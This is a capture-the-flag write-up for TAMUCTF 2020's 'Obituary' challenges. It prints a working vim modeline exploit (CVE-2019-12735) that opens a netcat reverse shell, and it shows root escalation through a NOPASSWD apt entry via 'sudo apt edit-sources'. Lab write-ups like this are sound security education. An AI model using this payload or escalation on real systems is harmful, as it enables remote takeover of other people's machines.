TAMUCTF 2020: Obituary 1 & 2

2020/03/30

Categories: CTF Writeup Pentest

Challenge

Obituary

395+398 points

Hey, shoot me over your latest version of the code. I have a simple nc session up, just pass it over when you’re ready.

You’re using vim, right? You should use it; it’ll change your life. I basically depend on it for everything these days!


Obituary 1

We are given an OpenVPN configuration file. This will allow us to connect to the VPN and have access to 172.30.0.2.

Running a port scan with the command nmap -sC -sV 172.30.0.2 shows that only port $4321$ is open. Reading the challenge, we can guess that we can send files through this port, and that the files sent will be opened in the vim text editor. As the challenge says, you should use it. However, old versions of vim are vulnerable to CVE-2019-12735, which allows arbitrary code execution. Looking around we understand that sending the following file will get us a reverse shell at port $3333$:

:!nc 172.30.0.14 3333 -e /bin/bash||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

The reason why this line gets executed is because this exploit uses vim modlines, a “feature [that] allows to specify custom editor options near the start or end of a file.”

So, having set a nc listener (nc -lvvp 3333) in one window, we send the exploit file through nc:

cat exploit.txt | nc 172.30.0.2 4321

and terminate the process (Control+C). Coming back to the listener, we have a shell as user mwazowski and we can read the flag:

cat flag.txt
gigem{ca7_1s7_t0_mak3_suRe}

Obituary 2 (not the official solution)

For the second part of the challenge, we need to get root. We notice there is a note_to_self.txt file that says:

Apparently my packages are out of date. ITSEC is really throwing a fit about me
needing to update since red team popped my box.

I'm sending them my installed packages. I have no idea how these guys got root
on my machine, my password is like 60 characters long. The only thing I have
as nopasswd is apt, which I just use for updates anyway.

So we have apt as NOPASSWD, meaning that we can execute apt as user root. Looking around on gtfobins, we see that certain apt commands allow us to invoke a pager (most likely less) that can execute arbitrary commands, the same way vim does with :!command. However, trying what is shown on gtfobins throws an error:

sudo apt changelog apt
E: Failed to fetch changelog:/apt.changelog  Changelog unavailable for apt=1.8.2

So we have to find another way of invoking an editor or a pager. Looking at the help we notice:

apt --help
...
  edit-sources - edit the source information file

Using this command invokes vim and allows us to execute commands as root:

sudo apt edit-sources
:!cat /root/flag.txt

We get the flag:

gigem{y0u_w0u1d_7h1nk_p3opl3_W0u1d_Kn0W_b3773r}
>> Home